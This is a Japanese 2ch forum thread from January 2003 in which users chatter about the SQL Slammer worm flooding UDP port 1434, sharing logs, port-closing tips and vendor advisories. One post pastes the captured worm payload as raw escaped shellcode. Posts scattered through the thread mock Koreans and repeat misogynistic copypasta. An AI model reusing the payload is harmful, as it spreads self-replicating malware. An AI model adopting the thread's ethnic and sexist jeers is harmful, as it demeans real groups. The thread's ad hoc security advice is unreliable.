あ、オレ線踏んでたわ、ゴメンゴメン。

くそー高原のシュートが見たい

>>564
バカかテメエは。
データのちゃんとした読み方を知らないバカは
いいかげんな情報を垂れ流すな。

今WindowsXPを使っているんですが、
攻撃されているかどうか確認する手っ取り早い方法は何かありませんか？

MS SQL Server狙いってことは、やっぱ企業が休みの時に拡げたかったんだろうなぁ。

>>610
正解。I love youウイルスのときもそれで救われた。

エイリアンの攻撃か

>>616
netstat

>>570
はいになった

ﾏｶｰの人何か被害ある？
おいらは単に接続できなかっただけなんだけど。

>>616


　Ａ　Ｇ　Ｖ　を　入　れ　て　く　だ　さ　い　

ポート1434のアクセスで埋まったログの写真
http://sakots.pekori.jp/imgboard/imgs/img20030125192738.jpg

スラッシュドット ジャパン - 新型ワーム? ネットワークで全体で遅延発生中
http://slashdot.jp/article.pl?sid=03/01/25/0920206

未知のウィルスによる攻撃の緊急遮断について(1/25) - 東大内の情報処理関係のサイト
http://www.nc.u-tokyo.ac.jp/udp1434.html

InternetStormCenter
http://isc.incidents.org/

ポート番号1434をつつかれてウザイ〜その２
http://pc.2ch.net/test/read.cgi/sec/1043505853/　より

>>610
韓国は休みじゃないのか？

>>622
ウチはないよ。

おお、焼きそばを作っている間に3つもレスが
どうもありがとう

>>622
同じく

>>622
なんにもナイジェリア

>>616
パーソナルファイアウォール機能があるんじゃなかった？

素人にはさっぱりわからｍ

5000円台のﾙｰﾀｰを買おうかね

一分間に３回位ずつポートスキャン受けてるんだけど、多い？

>>622
いつもより不審なアクセスは少ないくらい。
けど、原理的にはWinもMacも関係なくアクセスされると思うのだが・・・？

どおりでこないだからうちの部屋が臭かったわけだ

>>600
どうもありがとね。環境変数････？ちょっと調べに逝ってきます。

>>605
Roger kill wivern

>>501
ノ

俺の会社ＧＭＯのサーバー使ってるから、こんなの慣れっこ。
普段からガンガン落ちるし。

ウチには１１５４にアタックきてまつが・・・・へいきなんでつか

この惨状に至ると、ゾネでも入れててよかったと思う。
３日前、ｸｿトロイに先生とオンラインスキャンが
対応できなかったせいだ。それで導入。。。
ありがとうBCDRなTrojan!!

>>564
何が違うんだろうな。
自分の所には全く来ないが。
最近のアッタクといえばそっちの方って印象があったが。

自分でウイルス対策できない馬鹿はマックつかえっての

すごまじいはっきんぐだな

今日は普段来ないところから来てるな。
.huとか.trとか初めて見たよ。

.zz って何処？

ここ90分で、
1434：6回
137：3回
256：1回
443：1回

何かいつもより軽快な気もするんだが・・・
韓国から何も来ないせいか？

>>643は厨房

ファイアヲールも何も入れてないのでつが・・・

http://www.zdnet.co.jp/enterprise/0301/25/epn02.html
速報：UDP/1434ポート宛のパケットが急増、新種のワームの可能性も
1月25日の午後より、UDP/1434ポート宛のパケットが急激に増加し、
国内外のネットワークに大きな影響を与えている。

犯人はよっぽどのひま人なんだろうな

ZoneAlarm
フリーで使用できるファイヤーウォールソフト
http://www.forest.impress.co.jp/library/zonealarm.html

ZoneAlarm日本語化ツール
「ZoneAlarm」のメニューやダイアログを日本語化
http://www.forest.impress.co.jp/library/zonealarm_nihongoka.html

あたちは僅かばかりの速度低下を理由にルーターを
外したヤシです。ゾーンアラームのログ見たら怖くなったので、
あわててルーターを取り付けて設定しますた。やっぱ、安全第一です。

>>650
がんがれ

PCの電源を入れたころには祭りは終わってた

>>650
SQLという言葉知らないなら大丈夫でつ。

http://recon.hp.infoseek.co.jp/cgi-bin/img-box/img20030125181557.jpg
２２２hit　ごらぁ！

浜崎あゆみ大嫌い

全然こないよ。ノートン先生働いてんのか?
カスタム設定　→未使用のポートアクセス時に警告はチェック入れといた
方がいい?

神砂嵐ッ！！！！

>>650が今までに受けた不正アクセスは20000ｱｸｾｼｭ

メッセンジャーにサインインできないのと関係ありますか？

どさくさにまぎれて中国からもしつこくアタックしてきやがる。
Winのコマンドプロンプト立ち上げてCドライブのリストを取ろうとしているが、
家のOSはFreeBSDだよーん。

これって鯖がかかるワームじゃネーノ？
あわててFW入れてるﾔｼ多いなぁ

まぁいい傾向ﾀﾞｹﾄﾞｗ

軍事衛星からのビームは夜中に降るだろう。

まだ重いYO!

ルータ設定で閉めるポート

１３５−１３９
３７
１２３
５１４

ほかに何閉めればいい？

イラクの戦争が近いな

ノートン先生のログが「無効な接続上の・・・。パケットを破棄しました」で埋まってる・・・
その数、14時から約5000個。
なんじゃこれ。

>>637
.........03............This is Wizard 03. Request order.

>>660

ルーターさんのお蔭。

ゾーンアラーム入れてるけど今日無反応だよ。
ルーター入れてるから？良く分からん。

>>665

ＰＣにファイアウォールソフトをいんすこすると、不具合がおきやすい。
できればブロードバンドルータとか買って、ルーターでブロックしたほうが
いいかも。

ド　ッ　キ　リ　だ　ろ　？

>>642
あ、すまん。見直したら>>564コピペをミスってた・・・（欝

213.77.16.243 port1028、またｷﾀ━━━━(ﾟ∀ﾟ)━━━━!!

NISのログビューアのぞいてみたらすごいことになってることにようやく気づいた。

韓国はもう滅亡したのか？

>>663
うちもサインインできない

んでこの混乱は27日中には収まるんだろ？

俺ら一般ユーザは別に対策とらなくてもいいんでしょ？

>>663
俺だけじゃなかったか

>>679
だとしたら大祭になるんけどな

>>680
>>663
俺もできない
MSの一部にもアクセスできん

不治ｷﾀ━━━━(ﾟ∀ﾟ)━━━━ｯ!!

ピー！ピー！ピー！緊急事態発生、緊急事態発生！！

史上最大の汚染の予感

今テレビで出ていたサイバーフォースセンターってなんか凄い名前だ……

>>680>>682
あ、やっぱいますたか。
普通にサインインできる人もいるみたいなんで、おかしいなと思って。
PASS間違ってないはずなのにエラー出るし。

１３４３か

>>646
なんそれー？
フルドメインｷﾎﾞﾝ

そのもの青き衣をまといて金色の野に・・

>>668
全部閉めて必要なのだけ開けれ。

ワームの中の人も大変だな。

１４３４？

この１時間に来たアタックの相手先ドメイン
jp kr com hu net edu at be us se ch ca cz pl to

住民票ネットワークは大丈夫なのか？
データーを抜き取るワームなのか？

>>671
priest2 1 待て！

winny

>>687
住民票ネットワークにﾜﾗﾀ

age

ニュースで
「全国のネットワーク管理者の皆さん、業務連絡です。
直ちにポート1434を閉じてください。」
って真剣な顔で言ってほしいな。

総務庁の鯖が落ちたわけだが、緊急に対応しなくていいのか？

.zzはまだインターネットに接続されていないネットワークのはずだが？

>>692
ランラララランランラン　らららららーらーらー

>>697だった。誤爆

>703
落ちたのか？

とりあえずルーターでUDPの1434閉じたんだが、
1434以外でやってくるポートの香具師は便乗？

おそらく遅いはずだが。「肛門も閉じました」ネタは出た？

今日はwinny立ち上げっぱなしで寝るのやめとこ

>>703 落ちてねえよ。

>>698
Wizard, Wizard 03, this is Trebor. Are you normal ?

>>702
素人ユーザーには関係ない話ですか？

>>703
http://www.asahi.com/national/update/0125/028.html
韓国のネットマヒで「日本では報告なし」　総務省

とほほ。。。

1434って何？うちのルーターには設定ないけど

子どもの時に夢見てたサイバーテロを間近に見ようとは。。。

人形使いの誕生か・・

そもそも、総務庁なんてねぇよ。

総務省だ。

トレンドマイクロに接続できんぞ。
こんな時に・・・金払ってんだぞ？ふざけてないか？

ウチのルーター、ログ取れないから
ルーターに穴あけてノートﾝ先生に遮断ルール作って
様子見てるけど何の音沙汰も無いです

>>708
発信元の方でport1025〜1029からアッタク来てる？
それは最近ずっと来てる奴。
今日は静かなくらい。

>>689 私もです
エラーばっかり出て何度やってもサインインできない

TCPの1434にアクセスしてきた馬鹿がいるぞ？？

>>719
それはいいこと

アサヒコムが繋がりにくいようですが。

>>718
たったいま俺、定義ファイルアップデートしてるんだが

>>711
ニュースぐらい見れよ
今は復帰してる

>>702
さっきニュースでやってなかった？

(;ﾟ∀ﾟ)=3ﾊｧﾊｧ

>>18
なんですか？それ
便器ですか

(o⌒∇⌒o)

2003/01/25 23:51:16通信の要求219.162.40.84TCP(80)
2003/01/25 23:39:24通信の要求61.92.123.8UDP(137)
2003/01/25 23:35:39通信の要求216.195.187.42UDP(137)
2003/01/25 23:31:57通信の要求210.189.94.12TCP(1154)
2003/01/25 23:29:20通信の要求210.189.94.12TCP(1154)
2003/01/25 23:29:19通信の要求219.162.40.84TCP(80)
2003/01/25 23:29:19通信の要求62.238.177.123UDP(1434)
2003/01/25 23:26:58通信の要求210.189.94.12TCP(1154)
2003/01/25 23:24:58通信の要求210.189.94.12TCP(1154)
2003/01/25 23:22:58通信の要求210.189.94.12TCP(1154)
2003/01/25 23:20:58通信の要求210.189.94.12TCP(1154)
2003/01/25 23:18:57通信の要求210.189.94.12TCP(1154)

↑のTCP1154ってなんでつか？

Trebor,this is wizard.

>>714
Microsoft-SQL-Monitor

ﾜﾚﾃﾙﾝﾃﾞｼｮ ヽ( ´ー`)-c＜丶`Д´)ノ ｵ､ｵﾗｸﾙﾆｽﾙﾆﾀﾞ

(o^o^o)

それで夕方ネットにつながらなかったのか？

IT先進国だと自慢ばっかりしてる彼の国が全滅だなんて意外だね。

>>713
家庭のパソコンで動いてるソフトじゃないので気にしなくていいよ

つーか、銃器ネットはいんたねっとじゃないし・・・
つーか、るーた使ってWANからのsynぱけと全部弾いてればいいし・・
つーか、WIN98のﾔｼはねとばいおす切手ほしいし・・・
つーか、おまいら・・・

シティバンク繋がらん。
このせいなの？

今さっきからパオコンの前にすわってケーブル見てるんだが・・　ワームはどうやって来るんだ？
ケーブルがちょっと膨らむのか？

>>702
ニュースで1434を使わないようにしてください
って言ってたな

>>713-714
うん、関係ないから寝てていいよ

Ah, we have heavy jamming, and now lost position.
Request further instraction. I say again, request order.

うちにも来てる。
1434　UDPのスキャン。
1時間10回くらい
でもルータがブロックしているし、
だいたいSQLサーバーなんて持ってないから
感染はしない（はず）。

マカフイのセキュリティレベルを「厳重」にまであげたら
１４３４イパイ来る。
いままで丸裸状態だったのか・・・
(((（ ;ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>741
ﾊｹﾞﾜﾗ

韓国の中の人も大変だなあ

ﾃﾞｼﾞｺﾑにもアクセスできん。
2ちゃんねるも重いし

サーバーにMSのソフトを使うからこうなる。

なんか重いと思ったらそういうことですか。

Happy Birthday

>>741
通る時は一瞬だから瞬きせずに見てないと見逃すと思われ

ウイルス名は「Sapphire」。
http://www.f-secure.com/v-descs/mssqlm.shtml

なんか遅いなー繋がんないなーってことで
メモリーを買ってきてしまったぞ！（２５６ＭＢ→６４０ＭＢ）

この出費はどうしてくれるんだ！

謝罪と倍賞の中の人も大変だな。

>>747
中に人などいないっ！

AVGとZoneAlermしか入れてないのでつが危険でつか？

>>742
・・・なんかｶｺｲｲ　いや、煽りとかじゃなくて。

マカーは調子いいのか？

ポート1434になんかくるね。
とりあえず閉じるか。

>>741
ケーブルからきますがケーブルはふくらみません。防ぐにはルーター
かＦＷの導入をおすすめします。

>>675
>ＰＣにファイアウォールソフトをいんすこすると、不具合がおきやすい。
>できればブロードバンドルータとか買って、ルーターでブロックしたほうが
>いいかも。

クライアント用のＦＷにも利点はある。
ルータやゲートウェイ型ＦＷではトロイの活動を防げない。

たのむからYBBの人は今すぐファイヤーフォール導入しなさい

韓国だったら緊急呼び出しでお仕事させられてたかもね

Wizard03 確認しました!

周辺空域にstranger無し！

>>708
昔流行ったワームがまだ生き残ってるせい、基本的に要らないポートを全部閉めてれば関係ない。

今ニュースで1434閉じろって！

>>755　そだった。人じゃなかったね。

>>754
ずいぶん変則的な増設をするんだな
256+256+128？

>>759
閉じ方教えれ。

>>754
今まで２５６しか積んでいなかったのか？

XPの場合はどうなるんだ？(;´Д`)
素人はこの場合座して死を待つのみか？（;´д⊂）

>>754
経済活性化に貢献乙

漏れ、ルータも使ってないし、串も通してないし、ファイアウォールも付けてなく、
ウィルススキャンしか入れてないのですが、大丈夫かな？

というか、不正アクセス受けると何かなるの？

>>741
ケーブルをきつく握るか、針金で縛っとけ
通ってきたら詰まるから、あとは思う存分鑑賞しれ。

ルータのログみたら、この1434だけで500kb以上に・・・
ランプが物凄い勢いで点滅するわけだ・・・(´･ω･`)

正直、すまんかった。。。

>>753
Lenel 2　か。なかなかだな。

俺の頭に１４３４が直接監視している

>>761
だーかーらー、「トロイの木馬」を「トロイ」と呼ぶな。
貴様は「奈良の大仏」を「奈良」と呼ぶのか？

ニュースで1434なんて言ったですか

>>773
スーパーハカーにＩＰ抜かれます（ｗ

This is Wizard 03. Request order.
This is Wizard 03. Request order.........

>>773漏れと同じ

http://jbbs.shitaraba.com/news/723/

マ社

1434がスゲエきてる

SQL Server購入してる素人がいっぱいいるのか・・・

137のも今回のだよ。

うちにはまったくアタック来てないぞ。

漏れのチンポで1434ポート閉じてもいいですか？

>>779
おもろい。今度宴会のネタにさせてもらうよ

mySQLにしとけばよかったのに。といってみる。

ルータのログに
LOG_WARNING S03:MSQ: Discard packet. UDP(*.*.*.*,1479 -> *.*.*.*,1434)
未だ多数訪問有り、IP変えてもご来店。しつこいよ。

IP抜かれるデメリットとかがよく分からない（汗

ノートン先生、重いから嫌なんだけどな
仕方ないから入れるか

>>741
http://ton.2ch.net/sec/kako/997/997283377.html の12より


　　　　　　　| 　　　　　　 |　海底ケブール斬ってﾖｼ！
　　　　　　　||l　 ∧Ω∧ υ――――――――――
　　　　　　　 l|ll （´∀｀　） 　ｻﾞｸｰﾘ　　　　<ﾟ彡巛
　　　　　　　 .l|l　ヽ ∨ ノ, 　　　　　　　　　　　　　　<ﾟ彡巛
　＿＿＿＿＿l| (/`'(　) ＼ ＿＿＿＿＿＿＿＿＿＿＿＿＿
ｱNNN…（ﾟ∀ﾟ ){,.,}.A。）ｸﾞﾋｬ!（ ゜∀゜)（゜∀゜)ｱdefault.ida?XXXXX…
￣￣￣￣￣￣　 ￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣

今日はあちこちで三沢のハッキング騒ぎや基幹回線の破壊や
後藤さんのおたけびを読んだ気がする。

ああ、Korean Warなのか

もともとSQLやNetBIOSは外に向けて開けるもんじゃねーよ

緊急事態発生！緊急事態発生！！

>>779
大文字の送り火を大文字焼きと呼んでますが？
(それじゃあお菓子か…)

>>771
とりあえず素人でも"SQL Server"でぐぐってみれ

>>785
マ大佐なみの違和感を感じる

>>794
IP抜かれるとインターネットに接続できなくなる

以前：１２８＋１２８（ＭＢ）
現在：１２８＋５１２（ＭＢ）

でし。

>>791　宴会ではウケないと思われ・・・

あわわわ・・・
冗談のつもりだったのに
大変な事になっちゃったよー。

↓ネット板住民が捕獲しててワラタ
http://www.digitaloffense.net/worms/mssql_udp_worm/disassembly.txt

>780
モニターには「1434」と映ってた。

ルータのログに
LOG_WARNING S03:MSQ: Discard packet. UDP(*.*.*.*,1479 -> *.*.*.*,1434)
未だ多数訪問有り、IP変えてもご来店。しつこいよ。

我が研究室のサーバ、止めますた！

すんげえ、攻撃されてて、焦ったよ・・・

マックスとローガンが何とかしてくれるよ

この不況でおやじなんてリストラされて当然です。高校の頃からこれからは女性の時代だってみんな言ってました！いえ、先生からも習いました。
でも、この現実はおかしいじゃないですか！本当に！面接は顔で差別されるし！
雑用やコピー？お茶組み？絶対できるわけありません！
この世の中間違ってます！男は染んでください！!!

やってきます。

>>779
海外でTrojan HorseをTrojanと略しているケースが有るが?

>>806
今のうちに出頭しる
さもないと通報しますたするぞ

とりあえず、このｽﾚ読んで
port137-139
port1025-1029
port1433-1434
port80
を閉じてればokだというのはよく分かった。

>>798
Win専門の奴は、全部閉じて必要なものだけ最小限開けるっつー概念がないからなぁ

>>721
自分もサインインできない
さてどうしたことか

>779
お前こないだあけおめとか言ってなかった？

>>782
もともと、空自のバッジシステムはその性格上閉鎖システムとして・・

警察庁 専門部隊に待機指示
http://www.nhk.or.jp/news/2003/01/25/k20030125000165.html

げっちゅ

世界を麻痺させた会社は涼しい顔してるな。
http://www.microsoft.com/japan/

ｲﾝﾀﾈｯﾄって頑丈だと思った今日この頃、となりの国はﾌﾞﾁ�dでましたけどw

80番からもくるぞ

>>807
ウイルスのコード?

１回/minくらいのおそろしい速さでアタックしてくるよ。
1434の他に何故か1300番台からも結構来るな…

ＤＢの違い

マイクロソフト製＝ＳＱＬ鯖ー　　訳のわからんＳＰ_コマンド
オラクル製＝ボラクル ぼったくりのオラクルマスター受験料　

しかし、アレだな
総務省の発表見てるとあのセリフが頭の中をよぎる…

「戦線から遠のくと、楽観主義が現実に取って代わる、
そして、最高意志決定の段階では、現実なる物はしばしば存在しない。
戦争に負けてるときは特にそうだ」.

>>810
坂●

実際のところ何もしなくても大丈夫
対策とその被害を天秤にかけると明らかに対策するほうが面倒

>>807
nopの連続の意味は…？
というか機械語なんて久しくやってないから忘れた。

自作自演のサイバーデモに1434ウォン

>>820
その代償が例のUDP1434騒ぎってことだろ？

>>825
NetRange: 218.0.0.0 - 218.255.255.255

ここら辺から８０番にガンガン来てる？

この騒ぎの最中、port21をつつかれたーよ（ｗ

特　徴:

　現在特定のUDPポート1434に対してDDoS攻撃を行い、
　システムをダウンさせるという報告が急増しています。

　これは Micirosoft SQLサーバー2000の脆弱性を狙っており、
　セキュリティホールの対策をしていないSQLサーバー2000はこの種の攻撃により、
　システムがダウンします。

　このDDoS攻撃から防御するために、
　UDPポート1434を閉じることをお勧めします。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=DDOS_SQLP1434.A

パトレイバーごっこやってる人は何がしたいの？

>>818
みんな緊急事態で使いまくるからだろ、ＩＣＱとかＩＲＣで代用すれば。

>>823
見たが、サイバーテロの感知装置にﾜﾗﾀ

>>829
何の話だ。少なくともまだ戦争など始まってはおらん

トレンドマイクロから速報出たーーーーーーーーー。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=DDOS_SQLP1434.A

知らぬが仏だな。

>>821
サイバーテロ専門部隊ってなんかｶｯｺｲｲ

ノートン先生を更新してたら平気なの？

symantecではウイルス本体を捕獲した模様。
http://securityresponse.symantec.com/avcenter/venc/data/w32.sqlexp.worm.html

137から、しょっちゅう来ます

つかだんだんネットおもくなってきた
感染してるだろまじ

>>828
製品自体もかなり高い
性能は間違いなく一番だけどね

流合雑音が上がってきてます

>>846
職人は手が早いね。

ケーブルのプライベートIPなんだけど、大丈夫かな・・・・
怖くなってきた。

>>814
Trojan は「トロイ」ではなく「トロイの」または「トロイのもの」だよ。
もっと英語を勉強してから出直してこい、バカ。

とくに.com系の鯖につながりにくいよぉ〜

ガーディアン・エンジェルスのサイバー隊はどうした（ｗ

おい、PORTってなんだ？

今夜わたしをシマンテック

>>835
163.21.240.92から

>844
多分シャツにジーパンで中分けメガネ・・

もしかして自爆の影響？

漏れの家にはなんの影響も無いが。
回線速度がもともと遅いから気付かないだけなのか？

>>842
>DDOS_SQLP1434.A

まんますぎてﾜﾗﾀ

<丶｀∀´> ｱｲｺﾞｰ

別にログに変な徴候ないけど名ぁ

>>835
そこYBB　つか、普段からいっぱい来る　今日に限ったことじゃない

サイバー攻撃の感知装置には異常は見つかっていないということですだって

店のサーバーWindows 2000 saver だ・・・・
明日の朝見てみよ・・・。
あぁー中央のサーバーが無事かあれとまると顧客データーが・・
あ、ネットにつながってねぇや・・。

　　　　　/ヽ |￣￣| /ヽ　　　　 　 ∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧
　　　　 /　ヽ|＿＿|/　　ヽ　　　　ﾉ　ウリナラ奥義！！
　　　／　　　＼　　　 /　＼　 く　　　　　　　　　F5連拳！！
　　<　　＼　　　ﾉ￣|　　　 〉っ ヽ　ﾁｮﾊﾟｰﾘどもに　オミマイするニダ！！
　　　＼　　　　┌―┤　　/　　　 ∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
　　　　＿_＿_＿＿　　　　　　 　　　　＿|￣|＿＿＿_　　　　　　　　|￣|　|￣|
　　　　|＿＿＿_ 　|　|￣|　　／￣|　 |＿　　＿＿　　|　＿＿＿ ,　｜　|　|　｜
　　　　　|＼_／ 　/　 ￣　／　／　　 　|　 |　　／_ ／　|＿＿＿| 　|＿|　|＿|
　　　　　＼　 ／　　|￣|／　／　　　　　|　|＿＿|　|
　　　　　　 ＼|　　　＼　　／　　　　　 　|＿＿＿＿| 　　　　　　　　□　　□
　　　　　　　　　　　　　　　　　　　　　　 　 　 　 　|　　　　　　 　 　 ∧＿∧
　　　　　 ∧,,∧　　　 |｜＼　　 ＼￣|￣~|　　 　 |　　　 　 　　　　<｀∀´　>
　　　 　<丶｀∀´> 　 ,|｜ 　l￣￣ l　 |：[］／＼　｜　　　　 　 ＿|￣￣||＿）＿
　　　 ┌‐ﾐ つつ／￣|｜／ ￣￣/　,| ／　　　＼|　　　　　／旦|――||/／ ／|
　　　　|└ヾ,, ,,|二二二」二二二二 ∧＿∧ 　 　 ＼　　　 |￣￣￣￣￣|￣| │
　 　 　 ￣||∪∪ 　 |　||　　　 　 ／<丶｀∀´>/￣￣/､ │ ＿＿＿＿ |三|／
　 ―――――――――――< 　（ _つ＿//ＬＧ,/〜'>――――――――――――
　 　 　 　 　 ∧,,∧　　　　　　　＼ _｛二二｝ 三三｝ ／＿＿ ＿＿＿＿
　 　 　 　 　<丶｀∀´> , ＿＿＿＿＼￣￣￣￣"／ =| 　 ／　　／　｜|∧∧
　　　　　　 / つ ＿//　　　　　　　/　 ＼ 　 ／| ￣｜　l￣￣ l　 　 |｜<｀∀´>
　 　 　　　 し'`|＼// _Hyundai＿/　　　 |＼／___,|　＝|　　＼￣ ＼　｜|¬ ⊂ ヽ/
　　　 　　　　　＼｝===========｝　　　 |　　 [二二二二二二二

汚染を除去しました。

>>825
間違ってもブロックするなよ、それhttp

>>852
普通の人には関係ないし
プライベートIPならルーターかんでるんで恐らく大丈夫

日本サイトも更新されてた。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sqlexp.worm.html

>>854
どっと混んでるからじゃねーの？

>>853　奈良の、ってことね

緊急事態発生！緊急事態発生！
待機中のセキュリティー部門職員は直ちに
中央コントロールセンターに配置して、次のアタックに備えてください。.

だから、遅すぎたと言ってるんだ！

>>852
全く問題なしだろ。不便だがな。

>>873
うまい

ルータ頑張ってまつ

今夜の祭はここでつか？

>>866
シマンテックのアラートは最高レベルをだったのに？
なにそれやばいんでない？

つーか

『インターネットに負荷与えるような脆弱性の高いサーバはDDosかけて沈黙させて良い』

って法律できねーかな、マジで

よくネット先進国の韓国からセキュリティー監視システムを導入とか言って
るセキュリティー会社とかあるが、ウィルスの大被害をしょっちゅう受けてる
彼の国のセキュリティー・システムなんて役に立たんことがよくわかる。

サンタさんったら一ヵ月間違えてるよ

この速さなら言える。

今日オナニーしたら、赤い玉が出た。

>>873
# -=･=-　　　-=･=-

>>869 いいから寝ろよガキ

警察庁が職員待機とかいってるけど、連中なんかできるの？

>>885
今日はお赤飯だね

>>885
エビオスの摂りすぎ

この不況でおやじなんてリストラされて当然です。高校の頃からこれからは女性の時代だってみんな言ってました！いえ、先生からも習いました。
でも、この現実はおかしいじゃないですか！本当に！面接は顔で差別されるし！
雑用やコピー？お茶組み？絶対できるわけありません！
この世の中間違ってます！男は染んでください！
!!!

今回 ニダ ワーム の狙いはズバリ
朝日に「ＩＴ大国、韓国」「ネット先進国、韓国」と書かせ
世界にその存在をアピールするはずが、自爆してしまい
逆にハリボテ、貧弱なネットワークを世界に晒し失笑をかってしまった
韓国内では、ネットに繋がらないイライラから火病が発症
ＰＣを、叩き壊す哀れな韓国人が激増中だ。
ttp://www.netomo.com/cgi-bin/transkj.cgi?http://www.wowhacker.com/BoArD/zboard.php?id=news

影響を受けるシステム : ウィンドウズNT、ウインドウズ2000、ウインドウズXP
影響を受けないシステム: ウインドウズ3.x、ウィンドウズ95、Windows98、ウインドウズ、マイクロソフトIIS、マッキントッシュ、OS/2、UNIX、Linux

>>888 サーバーの前で神頼み

前にもこんなことしてる香具師いたな。

この不況でおやじなんてリストラされて当然です。高校の頃からこれからは女性の時代だってみんな言ってました！いえ、先生からも習いました。
でも、この現実はおかしいじゃないですか！本当に！面接は顔で差別されるし！
雑用やコピー？お茶組み？絶対できるわけありません！
この世の中間違ってます！男は染んでください！
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

またアノ国のしわざか？

緊急事態発生！緊急事態発生！！ 直ちにPCから避難せよ
自爆装置起動、自爆装置起動！
乗組員は速やかに船外へ脱出してください

ピ〜〜〜〜！ピ〜〜〜〜！

緊急事態発生！緊急事態発生！！

>>856
とりあえず、0から65535まである。

218.0.0.0 - 218.255.255.255
この辺からものすごい勢いで来てるんですけど。
ちなみにApacheのログですが、これは違うんですかね？

>>885

★★★★★★★★★★★★★★★★★★★★★★★

重要！！！！！！！！！


このスレが、ウイルスに冒されているみたい！！！

なんか、警告がでました。

とりあえず読むのをやめたほうが
いい、かも

>>888 サーバーの前で神頼み

つーかサイバーテロ感知装置ってどこのなにを感知するんだ？

>>888
なんのために待機してるのか、意味不明だね。

パート２スレができるの先か日本のネットがダウンするのが先か

素敵な話じゃないか。
これが俺達のシビリアン・コントロールってやつさ・・・。

>>841
「始まってますよとっくに。気付くのが遅すぎた…
　codered…いや、その遥か以前から戦争は始まっていたんだ…
　突然ですが、あなた方には愛想が尽き果てました。自分も南雲部長と行動をともにいたします」

>>888
なんのために待機してるのか、意味不明だね。

なあ。ここみてたらウイルス検出されたんだが

もしこれが地球外の生物のしわさで、
地球人の知力や危機管理能力、平常心等を測るためのテストだと
SFチックな妄想をしながら寝ます。
がんばれ地球の頭脳よ！
最初に攻撃されるのは韓国だろうなぁ・・・おやすみなさい。

>>910
ｙｅｓ・・・

UDP1434に来た　ワームをとっつかまえますた・・
↓　ワームでつ。


^D^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A
^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A
^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A^A\xdc\xc9\xb0B\xeb^N^A^A^A^A^A^A^Ap\xaeB^Ap\xae
B\x90\x90\x90\x90\x90\x90\x90\x90h\xdc\xc9\xb0B\xb8^A^A^A^A1\xc9\xb1^XP\xe2\xfd5
^A^A^A^EP\x89\xe5Qh.dllhel32hkernQhounthickChGetTf\xb9llQh32.dhws2_f\xb9etQhsock
f\xb9toQhsend\xbe^X^P\xaeB\x8dE\xd4P\xff^VP\x8dE\xe0P\x8dE\xf0P\xff^VP\xbe^P^P\x
aeB\x8b^^\x8b^C=U\x8b\xecQt^E\xbe^\^P\xaeB\xff^V\xff\xd01\xc9QQP\x81\xf1^C^A^D\x
9b\x81\xf1^A^A^A^AQ\x8dE\xccP\x8bE\xc0P\xff^Vj^Qj^Bj^B\xff\xd0P\x8dE\xc4P\x8bE\x
c0P\xff^V\x89\xc6 \xdb\x81\xf3<a\xd9\xff\x8bE\xb4\x8d^L@\x8d^T\x88\xc1\xe2
^D^A\xc2\xc1\xe2^H)\xc2\x8d^D\x90^A\xd8\x89E\xb4j^P\x8dE\xb0P1\xc9Qf\x81\xf1x^AQ
\x8dE^CP\x8bE\xacP\xff\xd6\xeb\xca

ノートン先生がウィルスﾊｹｰﾝしますた

＞＞８６９はウイルスに感染しています。


引用します。

SARCでは現時点で、VBS.LoveLetterワームとその亜種・変種を29種類発見しています。 最新の変種は、VBS.LoveLetter.ACです。 2000年5月9日付のウイルス定義ファイルは、現在認識済みの亜種・変種ワームを全て検出・駆除します。

Norton AntiVirusのユーザは、LiveUpdate機能を使用するか、または、こちらをクリックし、最新のウイルス定義をダウンロードすることにより、既知のVBS.Loveletterワーム全てに対応することができます。

>>904
主要IX(インターネット相互接続点)をモニタリング。
MX,NYもバレバレですな。

\2ch\ニュース\ニュース速報+\1043499516.dat
は VBS.LoveLetter.A ｳｨﾙｽに感染しています｡
ﾌｧｲﾙへのｱｸｾｽが拒否されました｡

超漢字ですが何か？

>>900

YBBだって。

http://www.nhk.or.jp/news/2003/01/25/k20030125000165.html
おもしろい。

>>913
神

なんか時間を追うごとにひどくなってきてない？
何してもめちゃくちゃ重いんですが。

>>910

>>869

>>910
>869をあぽーん汁

昼過ぎにN＋板でこの障害のスレッドみた直後にどこにも
つながらなくなった。世界中大混乱か！？と思って
iモードからとあるサイトに接続してみたら普通につながった。。。
つか、うちの大学よく落ちるんだよなぁ。週末は復旧の
見込みなしだろうな。てわけでうちからかきこ。

＞＞８８８
確かにv

>>832
nop (無処理)はバッファオーバーフローを引き起こさせるための
ワーム君自身のサイズ調整だと思われ。

まともでない役人には２種類の人間しかいないんだ。悪党か正義の味方だ。

>>919
YBBって？

緊急事態発生！緊急事態発生！

このまま世界の通信が完全にノックアウトされたら面白いのにな（ｗ

PORTの閉じ方教えてクンニ

>>900
やっぱそうだよな！
1434程ではないが・・・

僕の肛門も感染されマスタ

ああっ、もうダメッ！！はうあああーーーーっっっ！！！
PING！PIN・・！打たれてるゥゥゥゥッッッッ！！！！
いやぁぁっ！あたし、こんなにいっぱい叩かれてるぅぅぅぅ！
カリカリカリカリカリカリカリカリカリッッ！！！！ボトボトボトォォッッ！！！
ぁあ…開く、ポート１４３４叩かないでぇぇぇぇ！！！
いやああああっっっ！！見ないで、お願いぃぃぃっっっ！！！
ポートスキャン！！！１４３４！！
んはああーーーーっっっ！！！２２５４！！２２２９！！！２２４８までぇぇぇぇ！！？
早く！！プロンプト開いてぇぇぇ！！！！
DOS攻撃！！エクスプロイト！！IPスプーフィング！！ゴミ箱あさりィィィィィッッゥ！！！
えっ？！１３７！！カッ、カッ！カンコック！？！もう気持ちイイイイイイイィィィィ！！

このスレあわてものばっかり。

MS SQLを使ってる奴は回線で吊って(略)

戦争だって？
そんなものはとっくに始まってるさ。
